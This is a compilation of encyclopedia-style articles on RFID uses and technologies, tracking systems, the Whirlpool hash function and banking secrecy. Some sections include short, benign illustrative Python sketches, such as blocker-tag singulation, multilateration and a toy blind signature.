Various schools have been using radio-frequency identification (RFID) technology to record and monitor students. The first school in the US to introduce RFID technology is thought to have been Spring Independent School District near Houston, Texas. In 2004, it gave 28,000 students RFID badges[1] to record when students got on and off school buses. This was expanded in 2008 to include location tracking on school campuses.[2]

Parents protested in January 2005 when Brittan Elementary School issued RFID tags to its students.[3] Administrators at the school, in Sutter, California, had been offered money by InCom to test its RFID product[4] and issued RFID-chipped ID tags to students. Students and parents felt they were not fully informed about the RFID, and questioned the tactics the school used to implement the program as well as the ethics of the monetary deal the school made with the company to test and promote its product. Parents quickly quashed the program with help from the American Civil Liberties Union.

In 2012, Northside Independent School District, San Antonio, Texas, introduced active RFID tags[5] worn on lanyards around students' necks. One student refused to participate in the program and was expelled from school,[6] after a court case.[7] The school eventually dropped the RFID program and started tracking students with cameras instead.

In 2007, Hungerhill High School, Doncaster, UK, trialled RFID chips sewn into students' blazers.[8] Ten children tested the RFID for attendance.[9] There were privacy concerns,[10] and the trial was stopped.

West Cheshire College integrated active ultra-wideband (UWB) RFID into its new college campuses in Chester in 2010 and Ellesmere Port in 2011, to tag students and assets[11] using a real-time location system (RTLS). Students wore the active RFID tags around their necks. West Cheshire College stopped RFID-tagging students in February 2013. A series of Freedom of Information requests had been sent to the college about the RFID tracking of students.[12] Specifications[13] of the active RFID at West Cheshire College:

After a school shooting in Germany in 2009, which claimed 16 lives, the Friedrich-von-Canitz School implemented a real-time location technology over Wi-Fi. The solution was developed by the German company How To Organize (H2O) GmbH in cooperation with teachers and the local police force.[14][15] A.B. Patil School, Sangli, Maharashtra, implemented UHF technology to keep track of students on school premises.

Passive RFID is used routinely in schools to register teachers and students and to provide access to services such as photocopying and door access.
https://en.wikipedia.org/wiki/RFID_in_schools
RFID Journal is an independent media company devoted solely to radio-frequency identification (RFID) and its business applications. A bi-monthly print publication and online news and information source, the journal offers news, features that address key adoption issues, case studies, and white papers written by academics and industry insiders on different aspects of RFID technology. The web site includes an FAQ section organized by topic, bulletin boards, a blog, an RFID event calendar, a searchable vendor directory, a career center, and a store where visitors can purchase reports by RFID Journal and others.

RFID Journal's digital magazine is published six times a year and focuses on high-level strategic issues. Topics include building a business case, achieving a return on investment by working with business partners, offsetting the cost of RFID mandates with internal savings, and aligning an RFID deployment strategy with a company's overall business strategy.

Launched on March 1, 2002, RFID Journal, LLC, is a privately held corporation headquartered in Melville, N.Y. RFID Journal is edited by Mark Roberti.[1][2][3][4][5]

The RFID Journal web site provides news about RFID, focusing on the latest deployments, mandates, standards development, and product innovation. Premium content includes features, case studies, best practices, and how-to articles that explain the technology's capabilities and how it is being used by companies. RFID Journal organizes international educational conferences where end users present case studies about how they are using RFID technology. RFID Journal University organizes courses on RFID and Electronic Product Code technologies.
https://en.wikipedia.org/wiki/RFID_Journal
RFID on metal (abbreviated ROM) refers to radio-frequency identification (RFID) tags designed to function when attached to metal objects. ROM tags overcome some of the problems traditional RFID tags suffer near metal, such as detuning and reflection of the RFID signal, which can cause poor tag read range, phantom reads, or no read signal at all. RFID-on-metal tags are designed to compensate for these effects.

There are several design methods for creating ROM tags. The original method was to provide a spacer to shield the tag antenna from the metal, resulting in bigger tags. Newer techniques focus on specialized antenna designs that exploit the metal interference and signal reflection to achieve a longer read range than similar-sized tags attached to non-metal objects.[1] RFID-on-metal transponders continue to create new opportunities in a wide range of asset-tracking and broader industrial applications. The main applications are asset tracking of servers and laptops in IT data centers, industrial manufacturing quality control, oil and gas pipeline maintenance, and gas cylinders.[2] The technology is evolving to allow transponders to be embedded in metal, which lets manufacturers track small metal items from cradle to grave. The main focus for RFID inside metal is tool tracking, weapon tracking, and medical device quality control.

RuBee (IEEE 1902.1) on metal

RuBee is a wireless 132 kHz packet-based protocol with a range of a few feet to 50 feet; it is magnetic and has near-zero radio-frequency (E-field) energy.[3] RuBee is often used where RF-based systems struggle in harsh environments, especially on and near steel and metal. Because it is magnetic, it has no multipath reflections and hence no nulls, and it is not blocked by steel, water, snow or dirt. RuBee is in widespread use in industrial environments (over 1,500 sites) on heavy machinery (injection molding machines and tools[4]), in armories[5] and in many defense[6] applications.
https://en.wikipedia.org/wiki/RFID_on_metal
An RSA blocker tag (or RSA tag) is an RFID tag that responds positively to all unauthorized requests, thus blocking some scanners from reading any RFID tags placed nearby. The tags are designed to protect privacy, and are claimed not to be usable for theft, denial of service, or other malicious purposes. Other mechanisms designed to protect privacy in RFID item tagging for retail use are the EPCglobal kill command and the Clipped Tag proposed by IBM.
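One way to see how blocking works is against the tree-walking singulation protocol some readers use to enumerate tags bit by bit. The following toy Python simulation is a simplified sketch under invented assumptions (4-bit IDs, a blocker protecting the ID prefix "1", and the blocker modelled as a flag rather than as over-the-air replies); it is not the actual RSA design, only an illustration of the flooding effect.

```python
# Toy simulation: tree-walking singulation with and without a blocker tag.
# A blocker answers "occupied" for every branch under its protected prefix,
# so the reader sees an exponentially large phantom subtree.

def tags_matching(prefix, tag_ids):
    return [t for t in tag_ids if t.startswith(prefix)]

def tree_walk(tag_ids, blocker_prefix=None, id_bits=4):
    """Enumerate tag IDs by walking the binary ID tree."""
    found, work = [], [""]
    while work:
        prefix = work.pop()
        blocked = blocker_prefix is not None and (
            prefix.startswith(blocker_prefix) or blocker_prefix.startswith(prefix))
        present = bool(tags_matching(prefix, tag_ids)) or blocked
        if not present:
            continue                      # empty subtree: reader prunes it
        if len(prefix) == id_bits:
            found.append(prefix)          # a (possibly phantom) singulated ID
        else:
            work.extend([prefix + "0", prefix + "1"])
    return found

tags = ["0101", "1100"]                   # "1100" lies in the protected zone
print(len(tree_walk(tags)))                      # 2: both real tags read
print(len(tree_walk(tags, blocker_prefix="1")))  # 9: the "1" subtree floods with phantoms
```

With the blocker present, the reader cannot distinguish the one real tag in the privacy zone from the eight phantom IDs the blocker simulates, which is the intended privacy effect.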
https://en.wikipedia.org/wiki/RSA_blocker_tag
A smart label, also called a smart tag, is an extremely flat transponder placed under a conventional print-coded label; it includes a chip, an antenna and bonding wires as a so-called inlay.[1][2][3] The labels, made of paper, fabric or plastics, are prepared as a paper roll with the inlays laminated between the rolled carrier and the label media, for use in specially designed printer units.

In many processes in logistics and transportation, the barcode or 2D barcode is well established as the key means of identification at short distance. Whereas automated reading of such optical codes is limited to an appropriate distance and usually requires manual operation to locate the code, or scanner gates that scan the entire surface of a coded object, the RFID inlay allows better tolerance in fully automated reading from a specified distance. However, the RFID inlay is more mechanically vulnerable than the ordinary label, whose own weakness is poor scratch resistance. Thus, the smartness of the smart label is earned by compensating for each technology's typical weaknesses through the combination of plain text, optical character recognition and radio code.

The processing of these labels is basically the same as for ordinary labels in all stages of production and application, except that the inlay is inserted in an automated processing step to ensure identical positioning for each label and careful handling to prevent any damage to the bonding. The printing is processed in two steps. Customisation of smart labels is available with chip cards. Combinations of magnetic stripes with RFID chips are also used,[4] especially for credit cards.

Replacing silicon processors, printed smart tags collect information themselves and process it. The result of decades of research and development by ThinFilm Electronics is "printed transistors; the multilayer tags combine a year's worth of battery power, sensors and a small display, and will initially be used to show a temperature record of perishable food and medications. Roughly 3 x 1.5 inches in size and consisting of five layers sandwiched in a roll-to-roll production process, the ThinFilm labels use the company's own ferroelectric polymer technology for storing information. Chains of non-toxic polymers can be flipped between two orientations – representing binary "0" and "1" – to store non-volatile data."[5]

While electronic labels cost more, the very small percentage of labels that are electronic is increasing. Electronic labels have features that non-electronic labels lack: they can signal what is happening in real time, and most can store a digital record.[6]

Smart labels are applied directly to packages or to pallets or other shipping containers. Application directly to the product itself is still of negligible importance. The technologies used in smart labels are all mature and well standardised. After the first wave of technology hype around RFID, current consolidation in the market shows hard competitive Darwinism. With increasing sales quantities, the inlays are still redesigned annually and appear in releases with new extensions to performance. However, integrating RFID into handling processes requires sound engineering to ensure a balance of benefit and effort. In 2008, ThinFilm and Polyera announced a partnership to produce high volumes of smart labels. The collaboration brings printed integrated systems, such as smart sensor tags, closer to commercial availability.[7]
https://en.wikipedia.org/wiki/Smart_label
Speedpass was a keychain radio-frequency identification (RFID) device introduced in 1997 by Mobil (which merged with Exxon to become ExxonMobil in 1999) for electronic payment. It was originally developed by Verifone. By 2004, more than seven million people possessed Speedpass tags, which could be used at approximately 10,000 Exxon, Mobil and Esso gas stations worldwide.

Speedpass was one of the first widely deployed consumer RFID payment systems of its kind, debuting nationwide in 1997 far ahead of VISA and MasterCard RFID trials. The ExxonMobil Speedpass was based on the Texas Instruments TIRIS RFID platform. It was originally designed by Verifone in two configurations: one intended for installation inside the fuel-dispensing "pump", and a convenience store model known as the Verifone RF250 (a redesign of the Ingenico iSC250 smart-card reader).

The ExxonMobil Speedpass used a cryptographically enabled tag with a Digital Signature Transponder (DST), which incorporated a weak, proprietary encryption scheme to perform a challenge–response protocol. On January 29, 2005, RSA Security and a group of students from Johns Hopkins University broke the proprietary encryption algorithm used by the Exxon-Mobil Speedpass.[1] They were able to successfully copy a Speedpass and use the copied RFID tag to purchase gas. In an attempt to prevent fraud, Speedpass users ultimately were required to enter their zip code into scanners at some gas stations.[1]

At one point, Speedpass was deployed experimentally in fast-food restaurants and supermarkets in select markets. McDonald's alone deployed Speedpass in over 400 restaurants in the Greater Chicago area. During the 1998 development of the RF250 convenience store reader, some prototype units were shipped from Verifone in Rocklin, California, to a Verifone office in Florida. The units did not arrive on time and were thought to have been lost in transit. They were later found; despite each unit bearing a Verifone logo and being encased in boxes showing the Verifone logo, the shipping company had nothing in its lost-goods database under that name. Rather, the units turned up via a query for "flying red horse", apparently because the units displayed a small Mobil logo, and the Mobil logo was and is a red Pegasus. The internal codename for the project was thus changed to "Flying Red Horse".[2][unreliable source?] The test was deemed a failure, and McDonald's removed the scanners from all its restaurants in mid-2004. Additionally, the New England grocery chain Stop & Shop tested Speedpass at its Boston-area stores; the units were removed in early 2005. Speedpass was also previously available as a Speedpass Car Tag and a Speedpass-enabled Timex watch.

ExxonMobil announced that the RFID-based key tag would be fully retired by June 30, 2019, and directed users to the Speedpass+ app on their smartphones. The smartphone app uses the phone's location data to pay at the pump: the app detects the user's location and prompts the user to input the pump number they are using. Conversely, if location services are not activated for the app, the user can scan a QR code on the pump to activate pay-at-the-pump functionality. In the United States, the app has since been renamed the Exxon Mobil Rewards+ app, although it still uses the Speedpass+ functionality. In Canada, the app continues to use the Speedpass+ name.
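The challenge–response exchange can be sketched as follows. This is a minimal illustration of the protocol shape only: the real DST transponder used the proprietary DST40 cipher with a 40-bit key (small enough that the 2005 attack recovered keys by brute force), whereas HMAC-SHA256 stands in here as a placeholder keyed function.

```python
# Minimal sketch of a DST-style challenge-response authentication.
# HMAC-SHA256 is a stand-in for the proprietary DST40 cipher; the 40-bit
# (5-byte) truncation mirrors the short responses such tags send.
import hmac, hashlib, os

SECRET_KEY = os.urandom(16)            # provisioned into the tag at manufacture

def tag_respond(challenge: bytes) -> bytes:
    """Tag computes a keyed response to the reader's random challenge."""
    return hmac.new(SECRET_KEY, challenge, hashlib.sha256).digest()[:5]

def reader_authenticate() -> bool:
    challenge = os.urandom(5)           # fresh random challenge per transaction
    response = tag_respond(challenge)   # an over-the-air round trip in reality
    expected = hmac.new(SECRET_KEY, challenge, hashlib.sha256).digest()[:5]
    return hmac.compare_digest(response, expected)

print(reader_authenticate())            # True for a genuine (or cloned) tag
```

The weakness exploited in 2005 was not the protocol shape but the keyed function itself: once the 40-bit key was recovered, an attacker could answer any challenge and the cloned tag became indistinguishable from the original.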
https://en.wikipedia.org/wiki/Speedpass
TecTiles are a near-field communication (NFC) application, developed by Samsung, for use with mobile smartphone devices.[1] Each TecTile is a low-cost[2] self-adhesive sticker with an embedded NFC Tag.[3] They are programmed before use, which the user can do simply with a downloadable Android app.[3] When an NFC-capable phone is placed or 'tapped' on a Tag, the programmed action is undertaken. This could cause a website to be displayed, the phone to be switched to silent mode, or many other possible actions.

NFC Tags are an application of RFID technology. Unlike most RFID, which strives for a long reading range, NFC deliberately limits this range to only a few inches, or almost touching the phone to the Tag. This is done so that Tags have no effect on a phone unless there is a clear user action to 'trigger' the Tag. Although phones are usually touched to Tags, no 'docking' or galvanic contact with the Tag is required, so they are still considered a non-contact technology. Although NFC Tags can be used with many smartphones, TecTiles gained much prominence in late 2012 with the launch of the Galaxy S III.[4][5]

Some applications are intended for customising the behaviour of a user's own phone according to a location, e.g. a quiet mode when placed on a bedside table; others are intended for public use, e.g. publicising web content about a location.[note 1] This programming is carried out entirely on the Tag. Subject to security settings, any compatible phone would have the same response when tapped on the Tag. When the Tag's response is a Facebook 'Like' or similar, it is carried out under the phone user's credentials (such as a Facebook identity), rather than the Tag's identity. Samsung groups Tags' functions under four headings:[6] Settings, Phone, Web and Social. A handful of examples:

Tags may also be pre-programmed and distributed to users. Such a Tag could be set to take the user to a manufacturer's service support page and sent out stuck to washing machines or other domestic white goods. Factory-prepared Tags can also be printed with logos, or moulded into forms other than stickers, such as key fobs or wristbands. A Tag's re-programmability is claimed at over 100,000 programming cycles.[5] A Tag placed on a doorway or noticeboard may be re-programmed in situ and could thus have a long life (e.g. spanning many conferences, meetings or events). Tags may be locked after programming[3] to prevent unauthorized reprogramming. Locked tags may be unlocked only by the same phone that locked them. If unlocking is not possible, the duration of a locked Tag's relevance will be the main constraint on its lifetime. A Tag's lifespan is also likely to be limited by physical factors such as the glue adhesion, or the difficulty of peeling it from the glue.

The TecTile app is not installed by default.[6] If a Tag is read before the app is installed, the user is directed to the app download site. Using a Samsung TecTile NFC tag requires a device with the MIFARE Classic chipset.[7] This chipset is based on NXP's NFC controller, which is outside the NFC Forum's standard; using a TecTile thus requires the NXP chipset, which is found in many Android phones. Recently, Android phone manufacturers have chosen to drop TecTile support, notably in Samsung's latest flagship phone, the Galaxy S4,[8] and Google's Nexus 4.[9] TecTiles also do not work with BlackBerry and Windows NFC phones.
The new version of TecTile, called TecTile 2, has improved compatibility,[10] but currently the Samsung Galaxy S4 is the only device that comes with native support for TecTile 2.[11] NFC Tags that do comply with the NFC Forum Type 1 or Type 2 compatibility protocols[12] are much more widely compatible than the MIFARE-dependent Samsung TecTile,[13] and are also widely available. Popular standards-compliant NFC Tags are the NTAG213 (137 bytes of usable memory) and the Topaz 512 (480 bytes of usable memory).[14]

The need for the installed app is one of the drawbacks of TecTile and of NFC Tags in general. The basic NFC Tag standards support Tags carrying URLs, where the scheme or protocol (e.g. the http:// prefix) may be http (for web addresses), tel for telephony, or an anonymous data scheme. Although support for the http and tel schemes may be assumed in a basic handset, support for the others will not be available unless an app has been installed and registered to handle them. In general, NFC Tags (in the non-TecTile sense) are only useful for web addresses and telephony.

To provide features beyond this, Samsung offers the TecTile app. This could have used any scheme on a tag, or even invented a whole new scheme; when installed, such an app would register itself to handle the new schemes. However, the app is not part of the default install for a handset, even a Samsung one. To allow users to install the app automatically on first encountering a TecTile, all the TecTile's sophisticated, phone-specific features are still provided through the http scheme: the base URL is the one for initially downloading the app, and the details of the TecTile operation are encoded as URL parameters within the query string (see the sketch following this section). When reading a Tag, one of two things happens:

This convoluted behaviour was chosen to make the app effectively self-installing for naive users. Why the app was not supplied by default is unknown. The downsides of this design choice are that the URLs required to activate TecTile functions are relatively long, meaning that non-TecTile NFC Tags with limited memory (137 bytes) generally cannot be used for functions other than web addresses, and that the lack of a non-proprietary approach to these more capable functions limits the development of NFC Tags as a general technique across all such handsets, rather than just Samsung TecTiles.
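The query-string mechanism described above can be illustrated with a small Python sketch. The URL, parameter names and action labels here are invented stand-ins (Samsung's actual encoding is proprietary); the sketch shows only the trick of piggybacking an action on the app-download URL.

```python
# Hypothetical sketch of TecTile-style encoding: the tag stores an ordinary
# http URL pointing at the app-download page, with the desired action
# carried as query-string parameters that only the installed app interprets.
from urllib.parse import urlencode, urlparse, parse_qs

APP_URL = "http://example.com/tectile-app"      # stand-in download page

def encode_action(action: str, **params) -> str:
    """Build the URL a tag would carry for a given action."""
    return APP_URL + "?" + urlencode({"action": action, **params})

def decode_action(url: str) -> dict:
    """What an installed app would do: recover the action from the query string."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}

tag_payload = encode_action("silent_mode", duration="480")
print(tag_payload)                  # a phone without the app just opens this page
print(decode_action(tag_payload))   # the app intercepts it and performs the action
```

This also makes the stated drawback concrete: the full payload is far longer than a bare web address, so it may not fit in a 137-byte tag.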
https://en.wikipedia.org/wiki/TecTile
A tracking system or locating system is used for tracking persons or objects that do not stay in a fixed location, and for supplying a time-ordered sequence of positions (a track). A myriad of tracking systems exist. Some are 'lag time' indicators, meaning the data is collected after an item has passed a point, for example a bar code, choke point or gate.[1] Others are 'real-time' or 'near real-time', like the Global Positioning System (GPS), depending on how often the data is refreshed. There are bar-code systems which require items to be scanned, and others which have automatic identification (RFID auto-ID).

For the most part, the tracking world is composed of discrete hardware and software systems for different applications. That is, bar-code systems are separate from Electronic Product Code (EPC) systems, and GPS systems are separate from active real-time locating systems (RTLS). For example, a passive RFID system would be used in a warehouse to scan boxes as they are loaded on a truck, and the truck itself would then be tracked on a different system using GPS, with its own features and software.[2] The major technology "silos" in the supply chain are:

Indoor assets are tracked by repetitively reading e.g. a barcode,[3] or any passive or active RFID tag, and then feeding the read data into Work in Progress (WIP) models, Warehouse Management Systems (WMS) or ERP software. The readers required per choke point are meshed auto-ID or hand-held ID applications. However, tracking can also provide monitoring data without being bound to a fixed location, by using a cooperative tracking capability such as an RTLS.

Outdoor mobile assets of high value are tracked by choke point,[4] 802.11, Received Signal Strength Indication (RSSI), Time Difference of Arrival (TDOA), active RFID or GPS yard management, feeding into either third-party yard management software from the provider or an existing system. Yard Management Systems (YMS) couple location data collected by RFID and GPS systems to help supply chain managers optimize the utilization of yard assets such as trailers and dock doors. YMS systems can use either active or passive RFID tags.

Fleet management is applied as a tracking application using GPS, composing tracks from a vehicle's successive positions. Each vehicle to be tracked is equipped with a GPS receiver and relays the obtained coordinates via cellular or satellite networks to a home station.[5] Fleet management is required by:

Person tracking relies on unique identifiers that are temporarily (RFID tags) or permanently assigned to persons, such as personal identifiers (including biometric identifiers) or national identification numbers, together with a way to sample their positions, either on short temporal scales as through GPS, or for public administration to keep track of a state's citizens or temporary residents. The purposes for doing so are numerous, ranging for example from welfare and public security to mass surveillance.

Mobile phone services

Location-based services (LBS) utilise a combination of A-GPS, newer GPS and cellular locating technology derived from the telematics and telecom world. Line of sight is not necessarily required for a location fix. This is a significant advantage in certain applications, since a GPS signal can still be lost indoors. As such, A-GPS-enabled cell phones and PDAs can be located indoors, and the handset may be tracked more precisely. This enables non-vehicle-centric applications and can bridge the indoor location gap, typically the domain of RFID and real-time locating system (RTLS) systems, with an off-the-shelf cellular device.
Currently, A-GPS-enabled handsets are still highly dependent on the LBS carrier system, so the choice of handset and the application requirements are not straightforward. Enterprise system integrators need the skills and knowledge to correctly choose the pieces that will fit the application and geography. Regardless of the tracking technology, for the most part the end-users just want to locate themselves or find points of interest. The reality is that there is no one-size-fits-all locating technology for all conditions and applications.

Tracking is a substantial basis for vehicle tracking in fleet management, asset management, individual navigation, social networking, mobile resource management and more. Company, group or individual interests can benefit from more than one of the offered technologies, depending on the context.

GPS has global coverage but can be hindered by line-of-sight issues caused by buildings and urban canyons; map-matching techniques, which involve several algorithms, can help improve accuracy in such conditions.[6] RFID is excellent and reliable indoors, or in situations where close proximity to tag readers is feasible, but it has limited range and still requires costly readers. RFID stands for radio-frequency identification; the technology uses electromagnetic waves to receive a signal from the target object and record its location on a reader, which can then be examined through specialized software.[7][8]

RTLS are enabled by wireless LAN systems (according to IEEE 802.11) or other wireless systems (according to IEEE 802.15) with multilateration, as sketched below. Such equipment is suitable for certain confined areas, such as campuses and office buildings. RTLS requires system-level deployments and server functions to be effective.

In virtual space technology, a tracking system is generally a system capable of rendering virtual space to a human observer while tracking the observer's coordinates. For instance, in dynamic virtual auditory space simulations, a head tracker provides information to a central processor in real time, enabling the processor to select the functions necessary to give the user feedback relative to their position.[1]

Additionally, there is vision-based trajectory tracking, which uses a color-and-depth camera known as a Kinect sensor to track 3D position and movement. This technology can be used in traffic control, human-computer interfaces, video compression and robotics.[9]
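As a concrete illustration of the multilateration such RTLS deployments perform, here is a minimal least-squares trilateration sketch in Python/NumPy. The anchor coordinates and measured ranges are invented example data; real RSSI- or TDOA-derived ranges would be noisy, which is why the problem is solved as least squares rather than exactly.

```python
# Minimal 2-D multilateration: given ranges from fixed anchors (e.g. Wi-Fi
# access points), linearize the circle equations |p - a_i|^2 = r_i^2 by
# subtracting the first from the rest, then solve A @ p = b in least squares.
import numpy as np

anchors = np.array([[0.0, 0.0], [10.0, 0.0], [0.0, 10.0]])  # known positions (m)
ranges  = np.array([7.07, 7.07, 7.07])                      # measured distances (m)

x0, r0 = anchors[0], ranges[0]
A = 2 * (anchors[1:] - x0)
b = (r0**2 - ranges[1:]**2
     + np.sum(anchors[1:]**2, axis=1) - np.sum(x0**2))

position, *_ = np.linalg.lstsq(A, b, rcond=None)
print(position)   # ~ [5.0, 5.0] for this example
```

With more than three anchors the same system is simply over-determined, and the least-squares solution averages out measurement noise.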
https://en.wikipedia.org/wiki/Tracking_system
In computer science and cryptography, Whirlpool (sometimes styled WHIRLPOOL) is a cryptographic hash function. It was designed by Vincent Rijmen (co-creator of the Advanced Encryption Standard) and Paulo S. L. M. Barreto, who first described it in 2000. The hash has been recommended by the NESSIE project. It has also been adopted by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC) as part of the joint ISO/IEC 10118-3 international standard.

Whirlpool is a hash designed after the Square block cipher, and is considered to be in that family of block cipher functions. Whirlpool is a Miyaguchi–Preneel construction based on a substantially modified Advanced Encryption Standard (AES). Whirlpool takes a message of any length less than 2^256 bits and returns a 512-bit message digest.[3]

The authors have declared that Whirlpool is not, and will never be, patented. The original Whirlpool is called Whirlpool-0, the first revision is called Whirlpool-T, and the latest version is called Whirlpool in the test vectors below.

The Whirlpool hash function is a Merkle–Damgård construction based on an AES-like block cipher W in Miyaguchi–Preneel mode.[2] The block cipher W operates on an 8×8 state matrix S of bytes, for a total of 512 bits. The encryption process consists of updating the state with four round functions over 10 rounds. The four round functions are SubBytes (SB), ShiftColumns (SC), MixRows (MR) and AddRoundKey (AK). During each round the new state is computed as S = AK ∘ MR ∘ SC ∘ SB(S).

The SubBytes operation applies a non-linear permutation (the S-box) to each byte of the state independently; the 8-bit S-box is composed of 3 smaller 4-bit S-boxes. The ShiftColumns operation cyclically shifts each byte in each column of the state: column j has its bytes shifted downwards by j positions. The MixRows operation is a right-multiplication of each row by an 8×8 matrix over GF(2^8); the matrix is chosen such that the branch number (an important property for resistance to differential cryptanalysis) is 9, which is maximal. The AddRoundKey operation uses bitwise XOR to add a key, calculated by the key schedule, to the current state. The key schedule is identical to the encryption itself, except that the AddRoundKey function is replaced by an AddRoundConstant function that adds a predetermined constant in each round.

The Whirlpool algorithm has undergone two revisions since its original 2000 specification. People incorporating Whirlpool will most likely use the most recent revision; while there are no known security weaknesses in earlier versions of Whirlpool, the most recent revision has better hardware implementation efficiency characteristics, and is also likely to be more secure. As mentioned earlier, it is also the version adopted in the ISO/IEC 10118-3 international standard.
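Below is a short, self-contained Python sketch of the Miyaguchi–Preneel chaining just described: H_i = W(key = H_{i-1}, block = m_i) XOR H_{i-1} XOR m_i, iterated over 512-bit blocks. The placeholder cipher toy_W is not Whirlpool's real W (whose S-box, diffusion matrix and round constants are fixed by the specification), so the output is not a real Whirlpool digest; only the padding rule and the chaining mode are faithful.

```python
# Structural sketch of Whirlpool's Miyaguchi-Preneel mode with a toy cipher.
import hashlib

BLOCK = 64  # bytes (512 bits)

def toy_W(key: bytes, block: bytes) -> bytes:
    # Placeholder keyed, length-preserving "cipher" -- NOT Whirlpool's W.
    return hashlib.shake_256(key + block).digest(BLOCK)

def miyaguchi_preneel(message: bytes) -> bytes:
    # Merkle-Damgard padding as in Whirlpool: a 1 bit (0x80), zeros, then
    # a 256-bit big-endian message-length field.
    bitlen = len(message) * 8
    message += b"\x80"
    message += b"\x00" * ((-len(message) - 32) % BLOCK)
    message += bitlen.to_bytes(32, "big")

    h = bytes(BLOCK)  # all-zero initial chaining value
    for i in range(0, len(message), BLOCK):
        m = message[i:i + BLOCK]
        e = toy_W(h, m)                                     # encrypt block under H_{i-1}
        h = bytes(a ^ b ^ c for a, b, c in zip(e, h, m))    # E xor H xor m
    return h

print(miyaguchi_preneel(b"The quick brown fox jumps over the lazy dog").hex())
```

The point of the mode is that the message block is mixed into the chaining value both as cipher input and in the final XOR, which makes inverting a single compression step as hard as attacking the underlying cipher.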
The 512-bit (64-byte) Whirlpool hashes (also termed message digests) are typically represented as 128-digit hexadecimal numbers. The following demonstrates a 43-byte ASCII input (not including quotes) and the corresponding Whirlpool hashes:

The authors provide reference implementations of the Whirlpool algorithm, including a version written in C and a version written in Java.[2] These reference implementations have been released into the public domain.[2]

However, research on the security analysis of the Whirlpool function has revealed that, on average, the introduction of 8 random faults is sufficient to compromise the 512-bit Whirlpool hash of the message being processed, and the secret key of HMAC-Whirlpool, within the context of the Cloud of Things (CoT). This emphasizes the need for increased security measures in its implementation.[5]

Two of the first widely used mainstream cryptographic programs that adopted Whirlpool were FreeOTFE, followed by TrueCrypt in 2005.[citation needed] VeraCrypt (a fork of TrueCrypt) includes Whirlpool (the final version) as one of its supported hash algorithms.[6]
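Where the interpreter's OpenSSL build provides it, Whirlpool can also be used directly from Python's hashlib; availability is build-dependent (newer OpenSSL releases may relegate it to a legacy provider), hence the guard in this sketch.

```python
# Using a system-provided Whirlpool implementation via hashlib, which exposes
# whatever digests the underlying OpenSSL build offers. 'whirlpool' is not a
# guaranteed algorithm, so check hashlib.algorithms_available first.
import hashlib

if "whirlpool" in hashlib.algorithms_available:
    h = hashlib.new("whirlpool")
    h.update(b"The quick brown fox jumps over the lazy dog")
    print(h.hexdigest())   # 128 hex digits = 512 bits
else:
    print("whirlpool is not provided by this OpenSSL build")
```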
https://en.wikipedia.org/wiki/Whirlpool_(hash_function)
This is a list of free and open-source software (FOSS) packages: computer software licensed under free software licenses and open-source licenses. Software that fits the Free Software Definition may be more appropriately called free software; the GNU project in particular objects to its works being referred to as open-source.[1] For more information about the philosophical background of open-source software, see free software movement and Open Source Initiative. However, nearly all software meeting the Free Software Definition also meets the Open Source Definition, and vice versa. A small fraction of the software that meets either definition is listed here. Some of the open-source applications are also the basis of commercial products, shown in the List of commercial open-source applications and services. Be advised that available distributions of these systems can contain, or offer to build and install, added software that is neither free software nor open-source.
https://en.wikipedia.org/wiki/List_of_free_and_open-source_software_packages
Banking secrecy,[1][2] alternatively known as financial privacy, banking discretion, or bank safety,[3][4] is a conditional agreement between a bank and its clients that all foregoing activities remain secure, confidential, and private.[5] Most often associated with banking in Switzerland, banking secrecy is also prevalent in Luxembourg, Monaco, Hong Kong, Singapore, Ireland, and Lebanon, among other offshore banking institutions.

Otherwise known as bank–client confidentiality or banker–client privilege,[6][7] the practice was started by Italian merchants during the 1600s in Northern Italy (in a region that would become the Italian-speaking region of Switzerland).[8] Geneva bankers established secrecy socially and through civil law in the French-speaking region during the 1700s. Swiss banking secrecy was first codified with the Banking Act of 1934, making it a crime to disclose client information to third parties without a client's consent. The law, coupled with a stable Swiss currency and international neutrality, prompted large capital flight to private Swiss accounts. During the 1940s, numbered bank accounts were introduced, creating an enduring principle of bank secrecy that is still considered one of the main aspects of private banking globally. Advances in financial cryptography (via public-key cryptography) could make it possible to use anonymous electronic money and anonymous digital bearer certificates for financial privacy and anonymous Internet banking, given enabling institutions and secure computer systems.[9]

While some banking institutions impose banking secrecy voluntarily, others operate in regions where the practice is legally mandated and protected (e.g. offshore financial centers). Almost all banking secrecy standards prohibit the disclosure of client information to third parties without consent or an accepted criminal complaint. Additional privacy is provided to select clients via numbered bank accounts or underground bank vaults.

Recent research has indicated that the use of offshore financial centers is a concern because criminals get involved with them; it is argued that these financial centers enable the actions of criminals. However, there have been attempts by global institutions to regulate money laundering and illegal activities.[10] Numbered bank accounts, used by Swiss banks and other offshore banks located in tax havens, have been accused by the international community of being a major instrument of the underground economy, facilitating tax evasion and money laundering.[11] After Al Capone's 1931 conviction for tax evasion, according to journalist Lucy Komisar, mobster Meyer Lansky took money from New Orleans slot machines and shifted it to accounts overseas. The Swiss secrecy law two years later assured him of "G-man-proof" banking.[11] Later, he bought a Swiss bank, and for years deposited his Havana casino take in Miami accounts, then wired the funds to Switzerland via a network of shell and holding companies and offshore accounts.[11]

Economist and Nobel Prize laureate Joseph Stiglitz told Komisar: "You ask why, if there's an important role for a regulated banking system, do you allow a non-regulated banking system to continue? It's in the interest of some of the moneyed interests to allow this to occur. It's not an accident; it could have been shut down at any time. If you said the US, the UK, the major G7 banks will not deal with offshore bank centers that don't comply with G7 bank regulations, these banks could not exist.
They only exist because they engage in transactions with standard banks."[11]

Further research in politics is needed to gain a better understanding of banking secrecy.[12] For instance, the role of economic interests, competition between financial centers, and the influence of political power on international organizations like the OECD are good places to start.
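Returning to the financial cryptography mentioned earlier: one classic public-key mechanism proposed for anonymous digital bearer certificates is the blind signature, in which a bank signs a token without seeing it. A toy sketch of Chaum-style RSA blinding follows; the tiny modulus and raw, unpadded RSA are insecure, illustration-only parameters.

```python
# Toy Chaum-style RSA blind signature: the signer signs a blinded message,
# and the client unblinds it into a valid signature the signer cannot link
# back to the signing session.
from math import gcd
import random

# Toy signer key (insecure parameters for illustration only).
p, q = 1000003, 1000033
n, e = p * q, 65537
d = pow(e, -1, (p - 1) * (q - 1))

m = 123456789 % n                      # "serial number" of a bearer certificate

# Client blinds m with a random factor r before sending it to the signer.
while True:
    r = random.randrange(2, n)
    if gcd(r, n) == 1:
        break
blinded = (m * pow(r, e, n)) % n

signed_blinded = pow(blinded, d, n)    # signer signs without ever seeing m

s = (signed_blinded * pow(r, -1, n)) % n   # client unblinds: s = m^d mod n
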